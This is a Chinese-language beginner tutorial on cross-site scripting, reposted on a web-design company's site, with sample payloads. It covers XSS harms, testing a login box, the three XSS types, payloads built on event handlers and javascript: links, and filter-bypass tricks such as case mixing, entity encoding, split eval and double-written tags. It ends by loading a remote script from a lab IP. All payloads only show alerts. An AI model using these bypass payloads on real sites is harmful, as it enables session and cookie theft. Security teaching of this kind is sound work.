XSS漏洞基础知识有哪些

XSS漏洞基础知识有哪些，很多新手对此不是很清楚，为了帮助大家解决这个难题，下面小编将为大家详细讲解，有这方面需求的人可以来学习下，希望你能有所收获。

10年积累的成都网站设计、成都网站制作、外贸网站建设经验，可以快速应对客户对网站的新想法和需求。提供各种问题对应的解决方案。让选择我们的客户得到更好、更有力的网络服务。我虽然不认识你，你也不认识我。但先做网站设计后付款的网站建设流程，更有密云免费网站建设让你可以放心的选择与我们合作。

一、XSS漏洞危害

1、盗取各种用户账号

2、窃取用户cookie

3、劫持用户会话

4、刷流量，执行弹窗

二、漏洞验证

1、在登录框输入下面代码,点击登录

<script>alert(123)</script>

XSS漏洞基础知识有哪些

2、弹出对话框，说明存在xss漏洞

XSS漏洞基础知识有哪些

三、漏洞分类

1、反射型

只能利用一次，必须构造特殊的连接让目标点击，比如上面的登录界面。

2、存储型

将特殊语句存储到页面，只要目标浏览该网页，就会被攻击，比如留言板。

3、DOM型

不与服务器进行交互，利用在本地渲染网页时触发

四、payload构造

伪协议

<a href="javascript:alert(123)">aiyou</a>

事件

<img src="./1.jpg" onmouseover='alert(123)'><img src="#" onerror='alert(123)'><input type="text" onkeydown="alert(123)"><input type="button" onclick="alert(123)"><div style="width:expression(alert(xss))">

五、绕过防护

1、大小写绕过

<SCript>alert(123)</SCript>

2、引号的使用

<img src="#" onerror="alert(123)"/><img src='#' onerror='alert(123)'/><img src=# onerror=alert(123) />

3、“/”代替空格

<img/src='#'/Onerror='alert(123)'>

4、对标签属性值转码

字母 ASCII 十进制编码十六进制编码

a 97 a a

<a href="j&#97;v&#x61script:alert(123)">aiyou</a>

5、头插入尾插入

<a href="&#01;j&#97;v&#x61script:alert(123)&#02;">aiyou</a>

6、拆分

<script>z='alert'</script><script>z=z+'(123)'</script><script>eval(z)</script>

7、双写绕过

<scrscriptipt>alert(123)</scscriptript>

六、外部调用

1、新建一个xss.js，内容为

alert(213);

2、构建paylaod,提交

<script src="http://192.168.1.129/js/xss.js"></script>

看完上述内容是否对您有帮助呢？如果还想对相关知识有进一步的了解或阅读更多相关文章，请关注创新互联行业资讯频道，感谢您对创新互联的支持。

文章标题：XSS漏洞基础知识有哪些
文章来源：https://www.cdcxhl.com/article4/gpsdoe.html

成都网站建设公司_创新互联，为您提供响应式网站、自适应网站、虚拟主机、定制开发、手机网站建设、网站制作

声明：本网站发布的内容（图片、视频和文字）以用户投稿、用户转载内容为主，如果涉及侵权请尽快告知，我们将会在第一时间删除。文章观点不代表本网站立场，如需处理请联系客服。电话：028-86922220；邮箱：631063699@qq.com。内容未经允许不得转载，或转载时需注明来源：创新互联

猜你还喜欢下面的内容